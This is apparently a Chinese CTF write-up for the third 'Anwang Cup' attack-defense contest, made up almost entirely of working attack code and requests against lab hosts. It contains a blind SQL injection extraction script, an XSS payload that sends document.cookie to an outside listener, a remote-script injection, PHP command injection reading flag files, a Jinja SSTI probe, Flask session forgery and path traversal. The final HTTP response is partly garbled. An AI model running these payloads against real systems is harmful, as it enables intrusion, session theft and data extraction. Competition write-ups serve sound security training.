【喜讯&线下wp】第三届“安网杯”网络攻防比武大赛

import requestsfrom requests.models import encode_multipart_formdataclass TrickUrlSession(requests.Session): def setUrl(self, url): self._trickUrl = url def send(self, request, **kwargs): if self._trickUrl: request.url = self._trickUrl return requests.Session.send(self, request, **kwargs)def format(s): s = s.replace(" ","/**/") s = s.replace("and","%26%26") return sdef sql(payload): burp0_url = "http://172.20.2.2:9001/" # burp0_url = "http://127.0.0.1:9001/" burp0_cookies = {"session": "eyJ1c2VybmFtZSI6Imd1ZXN0In0.YJn_9g.ovL1KTEt9f9hjEDMoZoplRtnEc"} burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "AcceptLanguage": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "AcceptEncoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded","Origin": "http://172.20.2.2:9001", "Connection": "close", "Referer":"http://172.20.2.2:9001/", "Upgrade-Insecure-Requests": "1"} burp0_data = {"from": "1", "to": f"{payload}"} # print(burp0_data) res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies,data=burp0_data) # print(burp0_url,len(res.text)) if "ဌํྌ" in res.text: return True # print(format("and (select user() like 'r%')"))chars = '{}-ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghiklmnopqrstuvwxyz0123456789,'s = ""for i0 in range(1,999): for i in range(len(chars)): # database train # flaggtable,tickets # flaggcolumn # payload = format(f"-1' or ascii(mid((select group_concat(column_name) frominformation_schema.columns where table_name in ('flagtable')) from {i0} for 1))<>'{ord(chars[i])}") payload = format(f"-1' or ascii(mid((select flagcolumn from flagtable) from{i0} for 1))<>'{ord(chars[i])}") # payload = format(f"-1' or ascii(mid((select group_concat(table_name) frominformation_schema.tables where table_schema in (database())) from {i0} for 1))<>'{ord(chars[i])}") # payload = format(f" and substr((select group_concat(column_name) frominformation_schema.columns where table_name='users'),{i0},1)='{chars[i]}'") if sql(payload): s += chars[i] print(s)

username=document.cookievar xmlhttp = window.XMLHttpRequest ? new XMLHttpRequest() : newActiveXObject('Microsoft.XMLHTTP'); xmlhttp.open("POST", "http://172.20.20.165:8081/", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.onreadystatechange = function (){ if (xmlhttp.readyState == 4 && xmlhttp.status == 200) { if(xmlhttp.responseText=='1') location.href='./admin/backendmanage.php'; else alert("Login Failed!"); } } xmlhttp.send("username="+encodeURIComponent(username));

/func2?csrf_token=ImY5ODNiNDQyZTc5MzY1OGE3Nzc5NTg3YmU4YzMyMDYwODAxNDIyMjUi.YJnvqA.S31i2YJcFg9TYzfXSncKtgGaS0&name=%3Cscscriptript+src%3D%22hhttpttp%3A%2F%2F172.20.20.165%3A8000%2F1.js%22%3E%3C%2Fsscriptcript%3E&submit=Get+It%21

GET /?action=upload&data=<?=`more$IFS$9../../../../../../fl*$IFS$9/1`?> HTTP/1.1Host: 172.20.2.3:9004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie:session=eyJjc3JmX3Rva2VuIjoiMjUwNWZkMmMxNWRiYWRjNjAxZDNlYjEyYzEzOWIzYjgxYmMzMTY0YyIsIm5hbWUiOiJndWVzdCJ9.YJnw4Q.jOc4Z-vNr3crAJqi6AZgtzCjAxYUpgrade-Insecure-Requests: 1Cache-Control: max-age=0

http://172.20.0.2:9006/err.php?errorinfo={{config}}

python flask_session_cookie_manager2.py encode -s "jecbW5Jx" -t "{u'username':u'admin'}"eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSU

GET /admin/backendmanage.php?img=/app_a384gh1.py HTTP/1.1Host: 172.20.2.2:9006User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cachefrom flask import Flask,request,render_template_string,redirect,render_template,sessionimport randomimport stringimport base64import ffffffff111llllagapp =Flask(import_name=__name__,template_folder='templates',static_folder='static',static_url_path='/static')app.config['SECRET_KEY'] =''.join(random.sample(string.ascii_letters + string.digits,8))@app.before_requestdef before_request(): if '/admin/' in request.path: sess_name='guest' print(session) if 'username' in session: sess_name=session['username'] if sess_name!='admin': return 'Your current account is '+sess_name+' not admin' @app.after_requestdef makeheader(response): response.headers["X-Powered-By"] = "PHP/7.2.10" response.headers["Hint"] = "Wake up Neo, the Matrix has you" response.headers['Server']='Apache/2.4.35 (Win64) PHP/7.2.10' return response @app.route('/')def redirect_2_index(): if 'username' not in session: print('not in session!') session['username']='guest' return redirect("./index.php", code=302） @app.route("/err.php")def err(): #I patched the SSTI vulnerability.How clever I am! errorinfo=request.args.get("errorinfo") blacklist=["(",")"] for black in blacklist: if black in errorinfo: return "You're just a dirty hacker,aren't you?" return render_template_string("Oh no,there is an Error! Error info:<p> %s" %errorinfo)@app.route("/index.php")def index(): return render_template("index.html")@app.route("/login.php",methods=['POST'])def login(): username=request.form['username'] password=request.form['password'] if "'" in username or "'" in password: return "You have an error in your SQL syntax; check the manual that correspondsto your MariaDB server version for the right syntax to use near '''" return '0'@app.route("/admin/backendmanage.php")def backendmanage(): img=request.args.get("img") if not img: img='1.png'  if "flag" in img: return "You're just a dirty hacker,aren't you?" content = '' with open(img, 'rb') as img_f: content = img_f.read() content = base64.b64encode(content) content=''.join([chr(i) for i in content]) return '<h1>Current Image:{img}</h1><!-- ?img=1.png --><img src="data:;base64,{content}">'.format(img=img,content=content)@app.errorhandler(Exception)def all_exception_handler(e): e=str(e) return redirect("/err.php?errorinfo="+e, code=302)if __name__ == '__main__': app.run(host="0.0.0.0",port=80)">

GET /admin/backendmanage.php?img=/proc/self/cwd/ffffffff111llllag.py HTTP/1.1Host: 172.20.2.2:9006User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.YJorfg.p9-04BbYO1G9w1IWqmSpINSJiSUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache•4Ï/1.0 200 OK•íent-O*^: µìmþ•fl; r•«±ëutf-8•íent--éàth: 171X->••red-By: <sÿ7.2.10•)í: Y©• up Neo, the 1«kix has youIêïer: ••••ïö.4.35 (Z)ú4) <sÿ7.2.10Uªò:•$ie«^: Tue, 11 May ÛMµ 07:21:22 GMT<h1>êëent "f e:þ•èsû••ÿÜÁßß}÷ß}÷õ×Ye•V .py</h1><!-- ?•h1.png --><img ²·"u«Z:;m«•64,flag='flag{95a749b6-b026-4ee0-af43-35a27eb5a516}'">